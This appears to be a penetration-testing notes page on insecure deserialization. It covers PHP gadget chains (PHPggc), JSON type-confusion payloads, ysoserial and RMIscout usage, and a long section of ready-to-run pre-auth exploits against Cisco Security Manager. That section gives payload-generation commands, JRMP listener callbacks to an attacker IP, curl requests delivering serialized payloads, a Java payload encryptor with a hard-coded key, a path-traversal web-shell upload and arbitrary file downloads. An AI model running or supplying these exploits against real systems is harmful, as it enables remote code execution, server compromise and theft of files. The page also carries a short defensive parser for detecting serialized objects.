# (De)Serialization

## PHPggc

Vulnerable block of code:

```php
<?php
// Attacker-controlled input goes straight into unserialize(): any class on the
// include path with a magic method (__wakeup, __destruct, __toString, ...) can
// be instantiated, which is what the gadget chains below build on.
$data = unserialize($_GET['data']);
print $data['message'];
```
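Because every string in PHP's serialize() format is length-prefixed, a small walker can list the classes an input would instantiate before any `unserialize()` call is made. The following is an added Python example, not PHPggc's or the page's own code; it mirrors the check that the `allowed_classes` option of `unserialize()` performs natively in PHP 7+, and its sample inputs are constructed for the page's `$data['message']` case.

```python
# Added example (not PHPggc's or the page's code): walk PHP's serialize() format and
# report which classes unserialize() would instantiate, without instantiating anything.

def php_serialized_classes(data: bytes) -> list:
    """Class names of every O:/C: token in a serialized value, in stream order."""
    classes = []
    if _walk(data, 0, classes) != len(data):
        raise ValueError("trailing bytes after the serialized value")
    return classes

def _walk(data: bytes, pos: int, classes: list) -> int:
    """Parse one value starting at pos; return the offset just past it."""
    tag = data[pos:pos + 1]
    if tag == b"N":                                   # N;
        return pos + 2
    if tag in (b"b", b"i", b"d", b"r", b"R"):         # b:1; i:42; d:1.5; r:2; (references)
        return data.index(b";", pos) + 1
    if tag == b"s":                                   # s:5:"hello";  (length, not quotes)
        colon = data.index(b":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                             # skip :"
        if data[start + length:start + length + 2] != b'";':
            raise ValueError("string length mismatch at offset %d" % pos)
        return start + length + 2
    if tag == b"a":                                   # a:2:{key;value;key;value;}
        colon = data.index(b":", pos + 2)
        count = int(data[pos + 2:colon])
        p = colon + 2                                 # skip :{
        for _ in range(2 * count):                    # keys and values alternate
            p = _walk(data, p, classes)
        return _close(data, p)
    if tag in (b"O", b"C"):                           # O:8:"stdClass":1:{...}  C:3:"Foo":5:{raw}
        colon = data.index(b":", pos + 2)
        name_len = int(data[pos + 2:colon])
        classes.append(data[colon + 2:colon + 2 + name_len].decode("utf-8", "replace"))
        p = colon + 2 + name_len + 2                  # skip the closing quote and ':'
        colon2 = data.index(b":", p)
        count = int(data[p:colon2])
        p = colon2 + 2                                # skip :{
        if tag == b"C":                               # custom Serializable payload: opaque bytes
            return _close(data, p + count)
        for _ in range(2 * count):                    # property name / value pairs
            p = _walk(data, p, classes)
        return _close(data, p)
    raise ValueError("unsupported or malformed token %r at offset %d" % (tag, pos))

def _close(data: bytes, pos: int) -> int:
    if data[pos:pos + 1] != b"}":
        raise ValueError("expected '}' at offset %d" % pos)
    return pos + 1

def unsafe_classes(data: bytes, allowed=frozenset()) -> list:
    """Classes the input would instantiate that are not allow-listed (non-empty = reject)."""
    return [c for c in php_serialized_classes(data) if c not in allowed]

# Constructed samples: what the page's $data['message'] expects, and the same array
# with an object smuggled in, which is the shape a gadget-chain payload takes.
SAFE = b'a:1:{s:7:"message";s:5:"hello";}'
GADGET = b'a:1:{s:7:"message";O:9:"SomeClass":1:{s:4:"file";s:8:"/tmp/x.y";}}'
```

Inputs whose length prefixes do not match the data raise `ValueError`, which is the right outcome for a request that should never reach `unserialize()`.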

{% embed url="<https://github.com/ambionics/phpggc>" %}

```
$ ./phpggc -l

Gadget Chains
-------------

NAME                                      VERSION                         TYPE                   VECTOR         I    
CodeIgniter4/RCE1                         4.0.0-beta.1 <= 4.0.0-rc.4      RCE (Function call)    __destruct          
CodeIgniter4/RCE2                         4.0.0-rc.4 <= 4.0.4+            RCE (Function call)    __destruct          
Doctrine/FW1                              ?                               File write             __toString     *    
Drupal7/FD1                               7.0 < ?                         File delete            __destruct     *    
Drupal7/RCE1                              7.0.8 < ?                       RCE (Function call)    __destruct     *    
Guzzle/FW1                                6.0.0 <= 6.3.3+                 File write             __destruct          
Guzzle/INFO1                              6.0.0 <= 6.3.2                  phpinfo()              __destruct     *    
Guzzle/RCE1                               6.0.0 <= 6.3.2                  RCE (Function call)    __destruct     *    
Horde/RCE1                                <= 5.2.22                       RCE (PHP code)         __destruct     *    
Laminas/FD1                               <= 2.11.2                       File delete            __destruct          
Laravel/RCE1                              5.4.27                          RCE (Function call)    __destruct          
Laravel/RCE2                              5.5.39                          RCE (Function call)    __destruct          
Laravel/RCE3                              5.5.39                          RCE (Function call)    __destruct     *    
Laravel/RCE4                              5.5.39                          RCE (Function call)    __destruct          
Laravel/RCE5                              5.8.30                          RCE (PHP code)         __destruct     *    
Laravel/RCE6                              5.5.*                           RCE (PHP code)         __destruct     *    
Laravel/RCE7                              ? <= 8.16.1                     RCE (Function call)    __destruct     *    
Magento/FW1                               ? <= 1.9.4.0                    File write             __destruct     *    
Magento/SQLI1                             ? <= 1.9.4.0                    SQL injection          __destruct          
Monolog/RCE1                              1.18 <= 2.1.1+                  RCE (Function call)    __destruct          
Monolog/RCE2                              1.5 <= 2.1.1+                   RCE (Function call)    __destruct          
Monolog/RCE3                              1.1.0 <= 1.10.0                 RCE (Function call)    __destruct          
Monolog/RCE4                              ? <= 2.4.4+                     RCE (Command)          __destruct     *    
Phalcon/RCE1                              <= 1.2.2                        RCE                    __wakeup       *    
PHPCSFixer/FD1                            <= 2.17.3                       File delete            __destruct          
PHPCSFixer/FD2                            <= 2.17.3                       File delete            __destruct          
PHPExcel/FD1                              1.8.2+                          File delete            __destruct          
PHPExcel/FD2                              <= 1.8.1                        File delete            __destruct          
PHPExcel/FD3                              1.8.2+                          File delete            __destruct          
PHPExcel/FD4                              <= 1.8.1                        File delete            __destruct          
Pydio/Guzzle/RCE1                         < 8.2.2                         RCE (Function call)    __toString          
Slim/RCE1                                 3.8.1                           RCE (Function call)    __toString          
Smarty/FD1                                ?                               File delete            __destruct          
Smarty/SSRF1                              ?                               SSRF                   __destruct     *    
SwiftMailer/FD1                           -5.4.12+, -6.2.1+               File delete            __destruct          
SwiftMailer/FW1                           5.1.0 <= 5.4.8                  File write             __toString          
SwiftMailer/FW2                           6.0.0 <= 6.0.1                  File write             __toString          
SwiftMailer/FW3                           5.0.1                           File write             __toString          
SwiftMailer/FW4                           4.0.0 <= ?                      File write             __destruct          
Symfony/FW1                               2.5.2                           File write             DebugImport    *    
Symfony/FW2                               3.4                             File write             __destruct          
Symfony/RCE1                              3.3                             RCE (Command)          __destruct     *    
Symfony/RCE2                              2.3.42 < 2.6                    RCE (PHP code)         __destruct     *    
Symfony/RCE3                              2.6 <= 2.8.32                   RCE (PHP code)         __destruct     *    
Symfony/RCE4                              3.4.0-34, 4.2.0-11, 4.3.0-7     RCE (Function call)    __destruct     *    
Symfony/RCE5                              5.2.*                           RCE (Function call)    __destruct
TCPDF/FD1                                 <= 6.3.5                        File delete            __destruct     *    
ThinkPHP/RCE1                             5.1.x-5.2.x                     RCE (Function call)    __destruct     *    
WordPress/Dompdf/RCE1                     0.8.5+ & WP < 5.5.2             RCE (Function call)    __destruct     *    
WordPress/Dompdf/RCE2                     0.7.0 <= 0.8.4 & WP < 5.5.2     RCE (Function call)    __destruct     *    
WordPress/Guzzle/RCE1                     4.0.0 <= 6.4.1+ & WP < 5.5.2    RCE (Function call)    __toString     *    
WordPress/Guzzle/RCE2                     4.0.0 <= 6.4.1+ & WP < 5.5.2    RCE (Function call)    __destruct     *    
WordPress/P/EmailSubscribers/RCE1         4.0 <= 4.4.7+ & WP < 5.5.2      RCE (Function call)    __destruct     *    
WordPress/P/EverestForms/RCE1             1.0 <= 1.6.7+ & WP < 5.5.2      RCE (Function call)    __destruct     *    
WordPress/P/WooCommerce/RCE1              3.4.0 <= 4.1.0+ & WP < 5.5.2    RCE (Function call)    __destruct     *    
WordPress/P/WooCommerce/RCE2              <= 3.4.0 & WP < 5.5.2           RCE (Function call)    __destruct     *    
WordPress/P/YetAnotherStarsRating/RCE1    ? <= 1.8.6 & WP < 5.5.2         RCE (Function call)    __destruct     *    
WordPress/PHPExcel/RCE1                   1.8.2+ & WP < 5.5.2             RCE (Function call)    __toString     *    
WordPress/PHPExcel/RCE2                   <= 1.8.1 & WP < 5.5.2           RCE (Function call)    __toString     *    
WordPress/PHPExcel/RCE3                   1.8.2+ & WP < 5.5.2             RCE (Function call)    __destruct     *    
WordPress/PHPExcel/RCE4                   <= 1.8.1 & WP < 5.5.2           RCE (Function call)    __destruct     *    
WordPress/PHPExcel/RCE5                   1.8.2+ & WP < 5.5.2             RCE (Function call)    __destruct     *    
WordPress/PHPExcel/RCE6                   <= 1.8.1 & WP < 5.5.2           RCE (Function call)    __destruct     *    
Yii/RCE1                                  1.1.20                          RCE (Function call)    __wakeup       *    
Yii2/RCE1                                 <2.0.38                         RCE (Function call)    __destruct     *    
Yii2/RCE2                                 <2.0.38                         RCE (PHP code)         __destruct     *    
ZendFramework/FD1                         ? <= 1.12.20                    File delete            __destruct          
ZendFramework/RCE1                        ? <= 1.12.20                    RCE (PHP code)         __destruct     *    
ZendFramework/RCE2                        1.11.12 <= 1.12.20              RCE (Function call)    __toString     *    
ZendFramework/RCE3                        2.0.1 <= ?                      RCE (Function call)    __destruct          
ZendFramework/RCE4                        ? <= 1.12.20                    RCE (PHP code)         __destruct     *
```

{% embed url="<https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Insecure%20Deserialization/PHP.md>" %}

{% embed url="<https://medium.com/swlh/exploiting-php-deserialization-56d71f03282a>" %}

{% embed url="<https://owasp.org/www-community/vulnerabilities/PHP_Object_Injection>" %}

{% embed url="<https://notsosecure.com/remote-code-execution-via-php-unserialize/>" %}

{% embed url="<https://insomniasec.com/cdn-assets/Practical_PHP_Object_Injection.pdf>" %}

## Nmap rmi script

```
nmap --script 'rmi*' <host>
```

## JSON

```
{"__type":"a"}
{"__type1":"a"}
{"__type":"System.Xml.XmlDocument, System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089", "InnerXml":"<!DOCTYPE stuff SYSTEM 'http://gqaxjsf76ajzgrxlvj9chh21ksqje8.burpcollaborator.net'><stuff>here</stuff>"}
```

## ysoserial gadgets

```
https://github.com/frohoff/ysoserial

$ java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd
0000000: aced 0005 7372 0032 7375 6e2e 7265 666c  ....sr.2sun.refl
0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41  ect.annotation.A
0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174  nnotationInvocat
...
0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76  vr..java.lang.Ov
0000560: 6572 7269 6465 0000 0000 0000 0000 0000  erride..........
0000570: 0078 7071 007e 003a                      .xpq.~.:

$ java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
$ nc 10.10.10.10 1099 < groovypayload.bin

$ java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe

```

## RMIscout

```
https://github.com/BishopFox/rmiscout

./rmiscout.sh wordlist -i lists/prototypes.txt localhost 11099
java -jar rmiscout.jar wordlist -h

examples:
# Perform wordlist-attack against remote RMI service using wordlist of function prototypes
./rmiscout.sh wordlist -i lists/prototypes.txt <host> <port>

# Bruteforce using method wordlist and other options
./rmiscout.sh bruteforce -i lists/methods.txt -r void,boolean,long -p String,int -l 1,4 <host> <port>

# Swap object-derived types with the specified ysoserial payload and payload parameter
./rmiscout.sh exploit -s 'void vulnSignature(java.lang.String a, int b)' -p ysoserial.payloads.URLDNS -c "http://examplesubdomain.burpcollaborator.net" -n registryName <host> <port>

# Use GadgetProbe and a known signature to bruteforce classes on the remote classpath
./rmiscout.sh probe -s 'void vulnSignature(java.lang.String a, int b)' -i ../GadgetProbe/wordlists/maven_popular.list -d "examplesubdomain.burpcollaborator.net" -n registryName <host> <port>

java -jar rmiscout-1.03-SNAPSHOT-all.jar wordlist -i lists/prototypes.txt 10.27.4.12 9050 --activation-server
java -jar rmiscout-1.03-SNAPSHOT-all.jar bruteforce -i lists/methods.txt -r void,String -p String,Object -l 1,2 10.27.4.12 9050 --activation-server
java -jar rmiscout-1.03-SNAPSHOT-all.jar exploit -s 'String echoString(String x)' -p ysoserial.payloads.Groovy1 -c "nslookup aiwjstf21seieezd11yr6ymgl7rzfo.burpcollaborator.net" -n RMIInterface 10.27.4.12 9050 --activation-server
java -jar rmiscout-1.03-SNAPSHOT-all.jar probe -s 'String echo(java.lang.Object qwewqe)' -i maven_popular.list -d "nslookup aiwjstf21seieezd11yr6ymgl7rzfo.burpcollaborator.net" -n RMIInterface 10.27.4.12 9050

maven_popular.list:
https://raw.githubusercontent.com/BishopFox/GadgetProbe/master/wordlists/maven_popular.list
```

{% embed url="<https://itnext.io/java-rmi-for-pentesters-part-two-reconnaissance-attack-against-non-jmx-registries-187a6561314d>" %}

{% embed url="<https://mogwailabs.de/en/blog/2019/03/attacking-java-rmi-services-after-jep-290/>" %}

## Deserialization in Cisco devices

> Cisco Security Manager is an enterprise-class security management application that provides insight into and control of Cisco security and network devices. Cisco Security Manager offers comprehensive security management (configuration and event management) across a wide range of Cisco security appliances, including Cisco ASA Adaptive Security Appliances, Cisco IPS Series Sensor Appliances, Cisco Integrated Services Routers (ISRs), Cisco Firewall Services Modules (FWSMs), Cisco Catalyst, Cisco Switches and many more. Cisco Security Manager allows you to manage networks of all sizes efficiently, from small networks to large networks consisting of hundreds of devices.

Several **pre-auth vulnerabilities** were submitted to Cisco on 2020-07-13 and (according to Cisco) **patched in version 4.22** on 2020-11-10. The release notes did not mention the vulnerabilities, and no security advisories were published. All payloads are processed in the context of **NT AUTHORITY\SYSTEM**.

Requirement: download *commons-beanutils-1.6.1.jar* from the Maven Central repository.

### Remote Code Execution SecretService.jsp :-)

`java -cp ./commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.GeneratePayload CommonsBeanutils1 "cmd.exe /c calc.exe" > payload_CommonsBeanutils`

`curl -k --request POST --data-binary "@payload_CommonsBeanutils" https://[TARGET_HOST]/CSCOnm/servlet/SecretService.jsp`

### Remote Code Execution CsJaasServiceServlet

Compile JaasEncryptor.java and replace the *b64Payload* content:

```java
import java.security.InvalidKeyException;
import java.util.Arrays;
import java.util.Base64;
import com.cisco.nm.cmf.security.jaas.BlobCrypt;

public class JaasEncryptor {

	public static void main(String args[]) throws InvalidKeyException {
		// Base64 of the serialized JRMPClient stream; replace with your own output.
		String b64Payload = "rO0ABXN9AAAAAQAaamF2YS5ybWkucmVnaXN0cnkuUmVnaXN0cnl4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7eHBzcgAtamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdEludm9jYXRpb25IYW5kbGVyAAAAAAAAAAICAAB4cgAcamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdNNhtJEMYTMeAwAAeHB3MQAKVW5pY2FzdFJlZgAIMTAuMC4wLjIAAAG7AAAAAEBnvkQAAAAAAAAAAAAAAAAAAAB4";

		byte[] payload = Base64.getDecoder().decode(b64Payload);
		// Hard-coded key the servlet's BlobCrypt uses (value from the original write-up).
		byte[] key = new byte[]{-100, 76, -23, 87, 125, 0, 5, 94, 12, 76, 37, -84, 36, 78, 123, 5};

		byte[] enc = BlobCrypt.encryptArray(payload, key);
		System.out.println("Encrypted payload: " + Base64.getEncoder().encodeToString(enc));
		// Sanity check: decrypting with the same key must give back the original bytes.
		byte[] dec = BlobCrypt.decryptArray(enc, key);
		if (!Arrays.equals(payload, dec)) {
			throw new IllegalStateException("BlobCrypt round-trip mismatch");
		}
	}
}
```

Prepare JRMP Listener:

`java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 443`

`java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]:443' | base64 -w0`

Compile encrypted payload:

`javac -cp [YOUR_PATH]/server_jars_classes/jars.jar:./ JaasEncryptor.java; java -cp [YOUR_PATH]/server_jars_classes/jars.jar:./ JaasEncryptor`

Send the payload to the servlet with the parameters *cmd=data*, followed by a new line, then *data=\[ENCRYPTED\_PAYLOAD]*.

### Remote Code Execution AuthTokenServlet

Prepare JRMP Listener:

`java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1337 CommonsBeanutils1 "cmd.exe /c calc.exe"`

`java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]:1337' > payload_JRMP1_2`

Send request:

`curl -k --request POST --data-binary "@payload_JRMP1_2" https://[TARGET_IP]/CSCOnm/servlet/com.cisco.nm.cmf.servlet.AuthTokenServlet`

### Remote Code Execution ClientServicesServlet

Prepare JRMP listener:

`java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1337 CommonsBeanutils1 "cmd.exe /c calc.exe"`

`java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]:1337' > payload_JRMP1_3`

Send request:

`curl -k --request POST --data-binary "@payload_JRMP1_3" https://[TARGET_IP]/CSCOnm/servlet/com.cisco.nm.cmf.servlet.ClientServicesServlet`

### Remote Code Execution CTMServlet

`java -cp ./commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.GeneratePayload CommonsBeanutils1 "cmd.exe /c calc.exe" > payload_CommonsBeanutils1_2`

`curl -i -s -k -X $'POST' -H $'Content-Type: application/octet-stream' -H $'CTM-URN: com-cisco-nm-vms-ipintel-IpIntelligenceApi' -H $'CTM-VERSION: 1.5' -H $'CTM-PRODUCT-ID: /C:/Program Files (x86)/CSCOpx/MDC/tomcat/vms/athena/WEB-INF/lib/' -H $'Cache-Control: no-cache' -H $'Pragma: no-cache' -H $'User-Agent: Java/1.8.0_222' -H $'Host: [TARGET_IP]' -H $'Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2' -H $'Connection: keep-alive' --data-binary "@payload_CommonsBeanutils1_2" $'https://[TARGET_IP]/athena/CTMServlet'`

### Arbitrary File Download XdmConfigRequestHandler

`GET /athena/xdmProxy/xdmConfig[RELATIVE_PATH_TO_FILE]`

### Arbitrary File Download XdmResourceRequestHandler

`GET /athena/xdmProxy/xdmResources[RELATIVE_PATH_TO_FILE]?dmTargetType=TARGET.IDS&dmOsVersion=7.&command=editConfigDelta`

### Arbitrary File Upload XmpFileUploadServlet

Write a web shell, e.g.

`POST /cwhp/XmpFileUploadServlet?maxFileSize=100`

A normal multipart upload; the web shell is written by setting the part's *filename* to a traversal path such as *../../MDC/tomcat/webapps/cwhp/testme.jsp*.

### Arbitrary File Download XmpFileDownloadServlet

`GET /cwhp/XmpFileDownloadServlet?parameterName=downloadDoc&downloadDirectory=[RELATIVE_PATH_TO_DIRECTORY]&readmeText=1`

This will respond with a ZIP file containing all files from the directory.

### Arbitrary File Download SampleFileDownloadServlet

`GET /cwhp/SampleFileDownloadServlet?downloadZipFileName=pwned&downloadFiles=README&downloadLocation=[RELATIVE_PATH_TO_DIRECTORY]`

This will respond with a ZIP file containing all files from the directory.

### Arbitrary File Download resultsFrame.jsp

`GET /athena/itf/resultsFrame.jsp?filename=[RELATIVE_PATH_TO_FILE]`

### Remote Code Execution SecretServiceServlet

See also <https://de.tenable.com/security/research/tra-2017-23>

`java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1337 CommonsBeanutils1 "cmd.exe /c calc.exe"`

`java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]:1337' > payload_JRMP1_2`

`curl -k --request POST --data-binary "@payload_JRMP1_2" https://[TARGET_IP]/CSCOnm/servlet/com.cisco.nm.cmf.servlet.SecretServiceServlet`

**Reference**: <https://gist.github.com/Frycos/8bf5c125d720b3504b4f28a1126e509e>

## Tools

{% content-ref url="../../tools/infrastructure-and-network/de-serialization" %}
[de-serialization](https://gitbook.seguranca-informatica.pt/tools/infrastructure-and-network/de-serialization)
{% endcontent-ref %}
